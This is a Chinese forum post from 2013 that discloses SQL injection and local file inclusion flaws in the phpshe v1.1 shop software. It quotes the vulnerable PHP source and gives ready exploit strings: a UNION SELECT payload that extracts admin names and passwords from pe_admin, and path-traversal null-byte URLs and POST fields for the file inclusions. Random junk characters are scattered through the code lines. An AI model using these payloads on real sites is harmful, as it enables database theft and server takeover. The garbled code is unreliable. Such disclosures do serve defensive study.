找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2315|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/$ l- G0 f; p9 Y. a
/* Phpshe v1.1 Vulnerability6 M* a+ l" x/ n1 A% Q2 v
/* ========================
! o7 L9 D. p" t! e" @( |: d( Z/* By: : Kn1f3
. n) `' Q" z6 v' o8 \2 m) G9 N9 v/* E-Mail : 681796@qq.com# j9 A% r; D$ `( c4 e0 H
/*******************************************************/# L1 w& A$ q* ]
0×00 整体大概参数传输, n( w1 t% X/ `' L

$ S7 S/ e) ^2 Y8 a
; J2 N( M* x9 x- q* C

* F9 j7 H8 I: w. i//common.php* l3 {0 V7 ?& P$ y
if (get_magic_quotes_gpc()) {; o) }' P2 F4 j, G
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ |4 i4 J, J# k* T8 o!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');% ]2 M8 M( }4 e( \
}
8 `# I% ?2 o. q6 G  Pelse {
: t4 b3 q. ?6 l, x: q* w# v+ L4 c- E!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
9 D# w3 k9 z5 Q! I6 z!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');7 P2 @9 h3 o" Q9 b* J# B# i
}
( ^3 f- H0 ^' k* c8 U0 Z+ ?session_start();
; M3 g6 x/ F, X!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
7 Y4 E" s, V4 [) S; [8 V5 j5 P!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');  Y$ m: _% Q- w# |9 `7 s# \- L8 G

$ ~- s- o" r! i4 _0×01 包含漏洞, l5 z, `* p  T' J

& e+ t/ ?, i8 q. m  v# \
. c# s3 p! k% l+ j" \$ M
//首页文件
6 u1 }% L1 e; ~- w<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
: R7 A$ o( E# j+ ?! S' S4 L8 Hinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
: M0 r5 S! N# g( Xpe_result();
# {- E8 a- i5 {) k4 k?>
; i# P' V& ]$ |) V7 M1 _5 {, U7 v0 a//common 文件 第15行开始2 O6 A/ d! v; f. g& b6 R
url路由配置
* i' W8 J% C/ }7 U$module = $mod = $act = 'index';3 k5 i# o- f+ T1 k  J; y9 {1 j/ H
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
& l; E9 g. [7 S& b, P9 Q$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$ A  u) s- y* x) Q8 y/ A$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
6 R/ \/ I6 O0 i2 j& {$ X//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
" K8 ?. U3 ~, p; M

) _( ^$ N% e& m4 |7 g' j" [* m
, A1 g3 H6 I- f4 {/ ^
0×02 搜索注入
4 ]- w: O" Y. I1 |% M# V% [+ ~3 F 5 m# Y& S) X& o
<code id="code2">

//product.php文件
3 D/ J& c* r$ @* T9 }case 'list':
2 g6 \; a; m& `0 U: A$category_id = intval($id);
6 r( U* n( a  q, @$info = $db->pe_select('category', array('category_id'=>$category_id));
* Q& C# p) I. k' [9 l$ e9 M* K//搜索
' X/ x, d% J2 P" b$sqlwhere = " and `product_state` = 1";
8 ~* r# `( h+ z/ H7 z' C) N" qpe_lead('hook/category.hook.php');& J, {# n* w, M) L) p# g: \
if ($category_id) {' b1 @) F( A1 q$ ]% W- S
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";$ P3 K2 O& Y  y
}
+ d. y; s+ {/ ~1 z$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
* D6 |* j6 z& T  a8 a1 uif ($_g_orderby) {
- b8 [, a: f" M$ u# _6 S$orderby = explode('_', $_g_orderby);) h: d9 c, l1 A4 o- _- I
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
% I2 C# I1 P/ i+ W6 Q+ U}
' e1 j: B" d6 \else {
3 F0 c' i6 z4 g$sqlwhere .= " order by `product_id` desc";4 j3 R; ^) K' p: F% y4 N7 J
}
; l' H0 u; ~, ?/ o, I" k$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
& h! I8 m* F* H5 n) w//热卖排行, [: I8 E) X" A/ U/ K$ g
$product_hotlist = product_hotlist();
8 k: z7 l2 R" j2 W//当前路径5 p" H6 p- @9 \" G1 L# }- O4 d& C$ j
$nowpath = category_path($category_id);
6 B+ e& {; d- |4 ^* `2 }$seo = pe_seo($info['category_name']);* R" j; S0 ~$ f2 W6 q
include(pe_tpl('product_list.html'));
0 o8 Z  t( X/ x/ _4 \5 v& s1 O//跟进selectall函数库
" Y+ V0 O! ?$ b4 y+ X" X% ?public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())# g' Y# O; m- k1 B. s% {
{
, l: C+ ~* a! c6 s4 P& V; m//处理条件语句
. W8 T, I% D2 B4 G5 L$sqlwhere = $this->_dowhere($where);
+ b) b& X9 Q5 A1 Lreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);% o7 \3 a% l( u% n& s  {
}8 n$ z# F7 Q& I, E. v
//exp" s  y) B* }4 r9 [# g$ e9 N
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
; Q  H1 y8 ]' C

</code>3 [' A( j( h7 W8 U$ f
4 d: E  i/ A. C4 C8 v
0×03 包含漏洞2( n7 z" n4 Y, Q
9 y4 y" I9 z5 S; D1 ]- J
<code id="code3">

//order.php

case 'pay':


5 w2 L) f" J; ?: w; \) u! f$order_id = pe_dbhold($_g_id);


7 f/ L9 x- h8 Q$cache_payway = cache::get('payway');

8 C% S9 B7 b- B: A9 z$ T. L' j
foreach($cache_payway as $k => $v) {

) @) @. r$ y6 Z
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

  w' v$ W5 r7 J  e, M7 c
if ($k == 'bank') {


, o5 T4 S+ u# ~9 h4 p$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

7 K" t( R1 w" k( D+ Q9 G2 _6 E
}


  k; z. p( x; S3 j4 x+ H3 _}


6 h* u. l- N' e$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

; }2 N7 x( d& j4 H
!$order['order_id'] && pe_error('订单号错误...');


6 ^5 V) w7 I- }- j3 zif (isset($_p_pesubmit)) {


2 L- M+ Y  b  h9 mif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


, _4 e% Y  f! g- k' k$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


/ t# }# L4 K4 l6 [- N/ S9 Q; lforeach ($info_list as $v) {

: O& f) A+ Y2 R" ~$ |
$order['order_name'] .= "{$v['product_name']};";1 a: }: a7 a. P+ ~+ d

1 S1 W+ i2 H1 f% h
}

# a0 q! h3 D- @" ]9 N  L
echo '正在为您连接支付网站,请稍后...';


) P. Q% |& A  v5 i6 Pinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


1 U* w: ^( W2 A, |+ [}//当一切准备好的时候就可以进行"鸡肋包含了"

* b4 n( h  U  k, [2 \
else {


5 K, c4 T* U7 spe_error('支付错误...');


7 J3 P& |3 P1 [& E5 a0 l- z  W" o}


; W) ]: C9 I" M3 J: j}


5 g3 Z8 t! g& g' l, x" k4 v7 z$seo = pe_seo('选择支付方式');


. h$ H$ c1 g- ^5 d2 ?$ oinclude(pe_tpl('order_pay.html'));

6 `9 g3 a: S& m( E
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code># a8 _* {: @/ c1 _* V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表